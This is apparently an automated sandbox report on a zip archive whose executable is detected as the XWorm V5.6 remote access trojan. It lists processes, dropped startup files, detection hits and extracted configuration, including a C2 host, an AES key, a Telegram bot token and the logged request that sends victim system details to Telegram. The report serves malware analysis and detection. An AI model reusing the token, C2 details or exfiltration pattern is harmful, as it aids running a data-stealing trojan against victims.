| File name: | sample.zip |
| Full analysis: | https://app.any.run/tasks/0c45a9ff-12d6-4d82-9e70-e8953547c56a |
| Verdict: | Malicious activity |
| Threats: | XWorm is a remote access trojan (RAT) sold as a malware-as-a-service. It possesses an extensive hacking toolset and is capable of gathering private information and files from the infected computer, hijacking MetaMask and Telegram accounts, and tracking user activity. XWorm is typically delivered to victims' computers through multi-stage attacks that start with phishing emails. |
| Analysis date: | January 10, 2025, 17:59:58 |
| OS: | Windows 10 Professional (build: 19045, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/zip |
| File info: | Zip archive data, at least v2.0 to extract, compression method=deflate |
| MD5: | B5F55B658C523A6A5D5FB30E0A0BF034 |
| SHA1: | 36001350CBADC03FB0204C99397A73D16167962E |
| SHA256: | 49FACDD5CF5378D91DB695F3E4813FC5DB285560FAF557910634A5581885BE52 |
| SSDEEP: | 768:Yt/eqNUsB7ScfIV2LNKl+Gx/nQfo13CYnY6r19de9RB:UmqNVaV2LNK8c/nQQzJri |
MALICIOUS
Create files in the Startup directory
- spatx.exe (PID: 4724)
Generic archive extractor
- WinRAR.exe (PID: 5780)
XWORM has been detected (SURICATA)
- spatx.exe (PID: 4724)
XWORM has been detected (YARA)
- spatx.exe (PID: 4724)
SUSPICIOUS
Executable content was dropped or overwritten
- spatx.exe (PID: 4724)
Process communicates with Telegram (possibly using it as an attacker's C2 server)
- spatx.exe (PID: 4724)
Reads security settings of Internet Explorer
- WinRAR.exe (PID: 5780)
Starts CMD.EXE for commands execution
- WinRAR.exe (PID: 5780)
Executing commands from a ".bat" file
- WinRAR.exe (PID: 5780)
Connects to unusual port
- spatx.exe (PID: 4724)
Possible usage of Discord/Telegram API has been detected (YARA)
- spatx.exe (PID: 4724)
Contacting a server suspected of hosting an CnC
- spatx.exe (PID: 4724)
INFO
Creates files or folders in the user directory
- spatx.exe (PID: 4724)
Reads Environment values
- spatx.exe (PID: 4724)
Manual execution by a user
- spatx.exe (PID: 4724)
Checks supported languages
- spatx.exe (PID: 4724)
- MpCmdRun.exe (PID: 2996)
Checks proxy server information
- spatx.exe (PID: 4724)
Reads the computer name
- spatx.exe (PID: 4724)
- MpCmdRun.exe (PID: 2996)
- MpCmdRun.exe (PID: 2728)
Reads the machine GUID from the registry
- spatx.exe (PID: 4724)
Reads the software policy settings
- spatx.exe (PID: 4724)
Executable content was dropped or overwritten
- WinRAR.exe (PID: 5780)
Create files in a temporary directory
- MpCmdRun.exe (PID: 2996)
The process uses the downloaded file
- WinRAR.exe (PID: 5780)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
XWorm
(PID) Process(4724) spatx.exe
C2212-86-105-164.cloud-xip.com:7000
Keys
AES<123456789>
Options
Splitter<Xwormmm>
Sleep time3
USB drop nameXWorm V5.6
MutexunbT6V2aoF0lIkoP
ims-api
(PID) Process(4724) spatx.exe
Telegram-Tokens (1)8176290575:AAFDf-S06wr8IAiqHiCrnvs7AnLIZxm9WAw
Telegram-Info-Links
8176290575:AAFDf-S06wr8IAiqHiCrnvs7AnLIZxm9WAw
Get info about bothttps://api.telegram.org/bot8176290575:AAFDf-S06wr8IAiqHiCrnvs7AnLIZxm9WAw/getMe
Get incoming updateshttps://api.telegram.org/bot8176290575:AAFDf-S06wr8IAiqHiCrnvs7AnLIZxm9WAw/getUpdates
Get webhookhttps://api.telegram.org/bot8176290575:AAFDf-S06wr8IAiqHiCrnvs7AnLIZxm9WAw/getWebhookInfo
Delete webhookhttps://api.telegram.org/bot8176290575:AAFDf-S06wr8IAiqHiCrnvs7AnLIZxm9WAw/deleteWebhook
Drop incoming updateshttps://api.telegram.org/bot8176290575:AAFDf-S06wr8IAiqHiCrnvs7AnLIZxm9WAw/deleteWebhook?drop_pending_updates=true
Telegram-Requests
Token8176290575:AAFDf-S06wr8IAiqHiCrnvs7AnLIZxm9WAw
End-PointsendMessage
Args
chat_id (1)6699230485
text (1)☠ [XWorm V5.6]
New Clinet :
3C54740F7CC0F23B53E5
UserName : admin
OSFullName : Microsoft Windows 10
Token8176290575:AAFDf-S06wr8IAiqHiCrnvs7AnLIZxm9WAw
End-PointsendMessage
Args
chat_id (1)6699230485
Token8176290575:AAFDf-S06wr8IAiqHiCrnvs7AnLIZxm9WAw
End-PointsendMessage
Args
chat_id (1)6699230485
text (1)☠ [XWorm V5.6]
New Clinet :
3C54740F7CC0F23B53E5
UserName : admin
OSFullName : Microsoft Windows 10 Pro
USB : False
CPU : Intel i5-6400 @ 2.70GHz
GPU : Microsoft Basic Display Adapter
RAM : 3.99 GB
Groub : XWorm V5.6 HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive
Telegram-Responses
oktrue
result
message_id14
from
id8176290575
is_bottrue
first_namesondom notif
usernamesondomBot
chat
id6699230485
first_namesondom
usernamesondom1
typeprivate
date1736532016
text☠ [XWorm V5.6]
New Clinet :
3C54740F7CC0F23B53E5
UserName : admin
OSFullName : Microsoft Windows 10 Pro
USB : False
CPU : Intel i5-6400 @ 2.70GHz
GPU : Microsoft Basic Display Adapter
RAM : 3.99 GB
Groub : XWorm V5.6
TRiD
| .zip | | | ZIP compressed archive (100) |
|---|
EXIF
ZIP
| ZipFileName: | spatx.exe |
|---|---|
| ZipUncompressedSize: | 138752 |
| ZipCompressedSize: | 25504 |
| ZipCRC: | 0x50bc9d96 |
| ZipModifyDate: | 2025:01:10 19:32:08 |
| ZipCompression: | Deflated |
| ZipBitFlag: | - |
| ZipRequiredVersion: | 20 |
Total processes
125
Monitored processes
8
Malicious processes
1
Suspicious processes
1
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 5780 | "C:\Program Files\WinRAR\WinRAR.exe" C:\Users\admin\Desktop\sample.zip | C:\Program Files\WinRAR\WinRAR.exe | explorer.exe | ||||||||||||
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Version: 5.91.0 Modules
| |||||||||||||||
| 4724 | "C:\Users\admin\Desktop\spatx.exe" | C:\Users\admin\Desktop\spatx.exe | explorer.exe | ||||||||||||
User: admin Integrity Level: MEDIUM Description: Version: 1.0.0.0 Modules
XWorm(PID) Process(4724) spatx.exe C2212-86-105-164.cloud-xip.com:7000 Keys AES<123456789> Options Splitter<Xwormmm> Sleep time3 USB drop nameXWorm V5.6 MutexunbT6V2aoF0lIkoP ims-api(PID) Process(4724) spatx.exe Telegram-Tokens (1)8176290575:AAFDf-S06wr8IAiqHiCrnvs7AnLIZxm9WAw Telegram-Info-Links 8176290575:AAFDf-S06wr8IAiqHiCrnvs7AnLIZxm9WAw Get info about bothttps://api.telegram.org/bot8176290575:AAFDf-S06wr8IAiqHiCrnvs7AnLIZxm9WAw/getMe Get incoming updateshttps://api.telegram.org/bot8176290575:AAFDf-S06wr8IAiqHiCrnvs7AnLIZxm9WAw/getUpdates Get webhookhttps://api.telegram.org/bot8176290575:AAFDf-S06wr8IAiqHiCrnvs7AnLIZxm9WAw/getWebhookInfo Delete webhookhttps://api.telegram.org/bot8176290575:AAFDf-S06wr8IAiqHiCrnvs7AnLIZxm9WAw/deleteWebhook Drop incoming updateshttps://api.telegram.org/bot8176290575:AAFDf-S06wr8IAiqHiCrnvs7AnLIZxm9WAw/deleteWebhook?drop_pending_updates=true Telegram-Requests Token8176290575:AAFDf-S06wr8IAiqHiCrnvs7AnLIZxm9WAw End-PointsendMessage Args chat_id (1)6699230485 text (1)☠ [XWorm V5.6]
New Clinet :
3C54740F7CC0F23B53E5
UserName : admin
OSFullName : Microsoft Windows 10 Token8176290575:AAFDf-S06wr8IAiqHiCrnvs7AnLIZxm9WAw End-PointsendMessage Args chat_id (1)6699230485 Token8176290575:AAFDf-S06wr8IAiqHiCrnvs7AnLIZxm9WAw End-PointsendMessage Args chat_id (1)6699230485 text (1)☠ [XWorm V5.6]
New Clinet :
3C54740F7CC0F23B53E5
UserName : admin
OSFullName : Microsoft Windows 10 Pro
USB : False
CPU : Intel i5-6400 @ 2.70GHz
GPU : Microsoft Basic Display Adapter
RAM : 3.99 GB
Groub : XWorm V5.6 HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive Telegram-Responses oktrue result message_id14 from id8176290575 is_bottrue first_namesondom notif usernamesondomBot chat id6699230485 first_namesondom usernamesondom1 typeprivate date1736532016 text☠ [XWorm V5.6]
New Clinet :
3C54740F7CC0F23B53E5
UserName : admin
OSFullName : Microsoft Windows 10 Pro
USB : False
CPU : Intel i5-6400 @ 2.70GHz
GPU : Microsoft Basic Display Adapter
RAM : 3.99 GB
Groub : XWorm V5.6 | |||||||||||||||
| 4536 | C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\Rar$VR5780.32595\Rar$Scan9889.bat" " | C:\Windows\System32\cmd.exe | — | WinRAR.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1684 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2996 | "C:\Program Files\Windows Defender\MpCmdRun.exe" -Scan -ScanType 3 -File "C:\Users\admin\AppData\Local\Temp\Rar$VR5780.32595" | C:\Program Files\Windows Defender\MpCmdRun.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Malware Protection Command Line Utility Exit code: 2 Version: 4.18.1909.6 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1556 | C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\Rar$VR5780.35624\Rar$Scan40160.bat" " | C:\Windows\System32\cmd.exe | — | WinRAR.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5080 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2728 | "C:\Program Files\Windows Defender\MpCmdRun.exe" -Scan -ScanType 3 -File "C:\Users\admin\AppData\Local\Temp\Rar$VR5780.35624" | C:\Program Files\Windows Defender\MpCmdRun.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Malware Protection Command Line Utility Exit code: 2 Version: 4.18.1909.6 (WinBuild.160101.0800) Modules
| |||||||||||||||
Total events
5 601
Read events
5 577
Write events
24
Delete events
0
Modification events
| (PID) Process: | (5780) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory |
| Operation: | write | Name: | 3 |
Value: C:\Users\admin\Desktop\preferences.zip | |||
| (PID) Process: | (5780) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory |
| Operation: | write | Name: | 2 |
Value: C:\Users\admin\Desktop\chromium_ext.zip | |||
| (PID) Process: | (5780) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory |
| Operation: | write | Name: | 1 |
Value: C:\Users\admin\Desktop\omni_23_10_2024_.zip | |||
| (PID) Process: | (5780) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory |
| Operation: | write | Name: | 0 |
Value: C:\Users\admin\Desktop\sample.zip | |||
| (PID) Process: | (5780) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | name |
Value: 120 | |||
| (PID) Process: | (5780) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | size |
Value: 80 | |||
| (PID) Process: | (5780) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | type |
Value: 120 | |||
| (PID) Process: | (5780) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | mtime |
Value: 100 | |||
| (PID) Process: | (4724) spatx.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\spatx_RASAPI32 |
| Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
| (PID) Process: | (4724) spatx.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\spatx_RASAPI32 |
| Operation: | write | Name: | EnableAutoFileTracing |
Value: 0 | |||
Executable files
3
Suspicious files
1
Text files
3
Unknown types
0
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 5780 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$VR5780.35624\sample.zip\spatx.exe | executable | |
MD5:DC4A7D4833A2FAE22A79623117B9BE04 | SHA256:CE0C0D380921529B7D871FE64A92439C64E56526CA63D7DB44C3D864E4FE82B5 | |||
| 2996 | MpCmdRun.exe | C:\Users\admin\AppData\Local\Temp\MpCmdRun.log | text | |
MD5:332684782DCC03EE0D90461CCCA5D994 | SHA256:C8CA0E2C0B5364E1B63C58CBF810CB7E093674D628D76E53F55ADAB6B56A15F2 | |||
| 5780 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$VR5780.32595\sample.zip\spatx.exe | executable | |
MD5:DC4A7D4833A2FAE22A79623117B9BE04 | SHA256:CE0C0D380921529B7D871FE64A92439C64E56526CA63D7DB44C3D864E4FE82B5 | |||
| 5780 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$VR5780.32595\Rar$Scan9889.bat | text | |
MD5:394047C3FE95E057C7790A811B7FEAB5 | SHA256:7F96E27F78F807F4A03FD8CC4305FC9BB609998E56A2D3A7933355F9279E0BDF | |||
| 4724 | spatx.exe | C:\Users\admin\AppData\Roaming\sparx.exe | executable | |
MD5:DC4A7D4833A2FAE22A79623117B9BE04 | SHA256:CE0C0D380921529B7D871FE64A92439C64E56526CA63D7DB44C3D864E4FE82B5 | |||
| 4724 | spatx.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sparx.lnk | binary | |
MD5:1F8FD822A52841E7BED8E614D30516D8 | SHA256:808CA44E1B394814D0619D6B5868EA783B11AE49AECC2E19048ED80DC2D8DE32 | |||
| 5780 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$VR5780.35624\Rar$Scan40160.bat | text | |
MD5:BC821B7175185C3F7296941FB4822566 | SHA256:758F7109DEC1816DB2544F92F8EBC4CFCD8CAF57894BF013A214C94E0999F4AA | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
21
DNS requests
8
Threats
4
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
5496 | svchost.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
5496 | svchost.exe | GET | 200 | 184.24.77.35:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
— | — | GET | 200 | 149.154.167.99:443 | https://api.telegram.org/bot8176290575:AAFDf-S06wr8IAiqHiCrnvs7AnLIZxm9WAw/sendMessage?chat_id=6699230485&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A3C54740F7CC0F23B53E5%0D%0A%0D%0AUserName%20:%20admin%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Intel%20%20i5-6400%20%20@%202.70GHz%0D%0AGPU%20:%20Microsoft%20Basic%20Display%20Adapter%20%0D%0ARAM%20:%203.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 | unknown | binary | 479 b | whitelisted |
— | — | POST | 204 | 92.123.104.32:443 | https://www.bing.com/threshold/xls.aspx | unknown | — | — | whitelisted |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4712 | MoUsoCoreWorker.exe | 40.127.240.158:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
— | — | 40.127.240.158:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown |
5496 | svchost.exe | 40.127.240.158:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
5496 | svchost.exe | 184.24.77.35:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
5496 | svchost.exe | 23.35.229.160:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted |
5496 | svchost.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
4712 | MoUsoCoreWorker.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
3976 | svchost.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
DNS requests
Domain | IP | Reputation |
|---|---|---|
google.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
settings-win.data.microsoft.com |
| whitelisted |
api.telegram.org |
| shared |
www.bing.com |
| whitelisted |
212-86-105-164.cloud-xip.com |
| unknown |
self.events.data.microsoft.com |
| whitelisted |
Threats
PID | Process | Class | Message |
|---|---|---|---|
— | — | Misc activity | ET HUNTING Telegram API Domain in DNS Lookup |
— | — | Misc activity | ET HUNTING Observed Telegram API Domain (api .telegram .org in TLS SNI) |
— | — | Misc activity | ET HUNTING Telegram API Certificate Observed |
— | — | Malware Command and Control Activity Detected | REMOTE [ANY.RUN] Xworm TCP Packet |